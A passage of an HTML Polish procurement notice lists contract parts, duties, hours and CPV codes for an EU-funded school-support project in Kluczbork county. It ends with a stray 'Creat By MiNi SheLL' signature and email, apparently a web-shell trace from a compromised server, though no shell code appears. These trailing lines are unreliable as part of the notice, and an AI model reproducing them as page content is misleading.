6)Organizacja techniczna i logistyczna pracy Szkolnych Organizatorów Rozwoju Edukacji (SORE) i koordynatorów sieci w poszczególnych placówkach, 
7)Opracowanie zasad współpracy szkół z SORE i sieciami współpracy; 
8)monitorowanie pracy SORE w realizacji zadań w szkołach/przedszkolach powiatu kluczborskiego
9)Zbieranie, opracowywanie, archiwizowanie danych sprawozdawczych na potrzeby monitoringu projektu;
10)Prowadzenie monitoringu rzeczowego;
11)Opracowanie, wdrożenie narzędzi monitoringu (wzory sprawozdań, zasady obiegu dokumentów);
12)monitorowanie wdrożenia Rocznych Planów Wspomagania (RPW), pracy sieci, ekspertów.
13)przestrzeganie i nadzorowanie przetwarzania danych osobowych w projekcie, zgodnie z ustawą z dnia 29 sierpnia 1997r. o ochronie danych osobowych (Dz. U. z 2002r. Nr 101, poz. 926 z późn. zm.); 
14)monitorowanie przepływu uczestników w Projekcie i nadzór nad prawidłowym stosowaniem przepisów dotyczących ochrony danych osobowych;
15)podleganie koordynatorowi merytorycznemu projektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.41.90.00-4, 79.42.11.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 20.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> SPECJALISTA DS. MONITOROWANIA PROJEKTU.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Praca na umowę cywilno - prawną,  szacowana liczba godzin w miesiącu - 40 godz. z wyłączeniem okresu wakacyjnego tj. miesięcy lipiec, sierpień w roku 2014 i w roku 2015, łączna max. liczba godzin w okresie realizacji umowy - 800 godz. Zadania Specjalisty ds. monitorowania projektu  obejmują w szczególności:
1)Realizacja procesu rekrutacji poprzez stworzenie baz danych Podsystemu Monitorowania Europejskiego Funduszu Społecznego 2007 (PEFS), list teleadresowych;
2)Organizacja spotkań rekrutacyjnych, prowadzenie rekrutacji poprzez podstronę PODN w Kluczborku, bezpośredni kontakt z dyrektorami/ nauczycielami  danych placówek, poprzez kanały internetowe;
3)Opracowanie strategii rekrutacji zawierającej przede wszystkim profil kandydata na uczestnika projektu, metody i techniki rekrutacji;
4)Udzielanie informacji w zakresie rekrutacji, obsługa techniczna procesu rekrutacji;
5)Tworzenie list rekrutacyjnych;
6)Organizacja techniczna i logistyczna pracy Szkolnych Organizatorów Rozwoju Edukacji (SORE) i koordynatorów sieci w poszczególnych placówkach, 
7)opracowanie zasad współpracy szkół z SORE i sieciami współpracy; 
8)monitorowanie pracy SORE w realizacji zadań w szkołach/przedszkolach powiatu kluczborskiego
9)Zbieranie, opracowywanie, archiwizowanie danych sprawozdawczych na potrzeby monitoringu projektu;
10)Prowadzenie monitoringu rzeczowego;
11)Opracowanie, wdrożenie narzędzi monitoringu (wzory sprawozdań, zasady obiegu dokumentów);
12)monitorowanie wdrożenia Rocznych Planów Wspomagania (RPW), pracy sieci, ekspertów.
13)przestrzeganie i nadzorowanie przetwarzania danych osobowych w projekcie, zgodnie z ustawą z dnia 29 sierpnia 1997r. o ochronie danych osobowych (Dz. U. z 2002r. Nr 101, poz. 926 z późn. zm.); 
14)monitorowanie przepływu uczestników w Projekcie i nadzór nad prawidłowym stosowaniem przepisów dotyczących ochrony danych osobowych;
15)podleganie koordynatorowi merytorycznemu projektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.41.90.00-4, 79.42.11.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 20.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> KOORDYNATOR MERYTORYCZNY PROJEKTU.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Praca na umowę cywilno - prawną,  szacowana liczba godzin w miesiącu -56 godz. z wyłączeniem okresu wakacyjnego tj. miesięcy lipiec, sierpień w roku 2014 i w roku 2015, łączna max. liczba godzin w okresie realizacji umowy - 1120 godz.
Zadania Koordynatora merytorycznego projektu obejmują w szczególności:
1)Organizacja pracy Szkolnych Organizatorów Rozwoju Edukacji (SORE), koordynatorów sieci, ekspertów
2)Rekrutacje/wizytacje w szkołach i przedszkolach na terenie powiatu kluczborskiego.
3)Promowanie, informowanie o projekcie na poziomie decydentów, w środowisku oświatowym , organów prowadzących;
4)Opracowanie schematu organizacji, zakresu pracy, obowiązków SORE oraz koordynatorów sieci;
5)Nadzór nad organizacją i realizacją rekrutacji, opracowanie harmonogramu działań rekrutacyjnych;
6)Nadzór nad działaniami SORE i koordynatorów sieci, wizytacje w poszczególnych placówkach,
7)Przygotowanie planu monitoringu;
8)Opracowanie koncepcji i metodologii badań 
9)Przygotowanie narzędzi do badań ankietowych i kwestionariuszowych;
10)Organizacja i przeprowadzenie  badań, opracowanie wyników;
11)Przygotowanie raportów z badań ,sformułowanie wniosków i rekomendacji;
12)Przestrzeganie i nadzorowanie przetwarzania danych osobowych w projekcie, zgodnie z ustawą z dnia 29 sierpnia 1997r. o ochronie danych osobowych (Dz. U. z 2002r. Nr 101, poz. 926 z późn. zm.); 
13)Monitorowanie przepływu uczestników w Projekcie i nadzór nad prawidłowym stosowaniem przepisów dotyczących ochrony danych osobowych;
14)Bezpośredni nadzór nad wykonaniem zadań przez Specjalistów ds. monitorowania projektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.00.00-4, 79.42.10.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 20.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> ADMINISTRATOR PODSTRONY INTERNETOWEJ  PROJEKTU.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Praca na umowę cywilno - prawną,  szacowana liczba godzin w miesiącu - 20 godz., łączna max. liczba godzin w okresie realizacji umowy - 480 godz.Zadania administratora podstrony internetowej projektu obejmują w szczególności:
Utworzenie, administrowanie i aktualizacja profesjonalnej strony internetowej z obsługą hostingową, łącznie z wypełnieniem jej treścią  merytoryczną
Wymagania odnośnie podstrony zwarte sa w SIWZ. Wykonawca zobowiązany będzie do:
a)zapewnia domeny oraz administrowania stroną przez okres trwania projektu tj. 
do 31.08.2015r.,
b)zapewnienie ciągłości działania strony przez okres trwania projektu,
c)instalacji oraz opublikowania strony WWW.  
Obsługa (administracja)  strony polegać  będzie na:
a)bieżącym usuwaniu wszelkich błędów w funkcjonowaniu strony (w terminie 24 godzin od momentu zgłoszenia problemu);
b)bieżącej aktualizacji strony co najmniej 1 raz w tygodniu, obejmującej zamieszczanie na stronie materiałów (treści, plików graficznych oraz multimedialnych) przekazywanych przez Zamawiającego, aktualizację komponentów;
c)Zamawiający będzie przesyłał Wykonawcy materiały do umieszczenia na stronie drogą elektroniczną. Wykonawca przekazane przez Zamawiającego materiały umieści na stronie w przeciągu 24 godzin od daty przekazania w dniach roboczych  (od poniedziałku do piątku)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.41.30.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com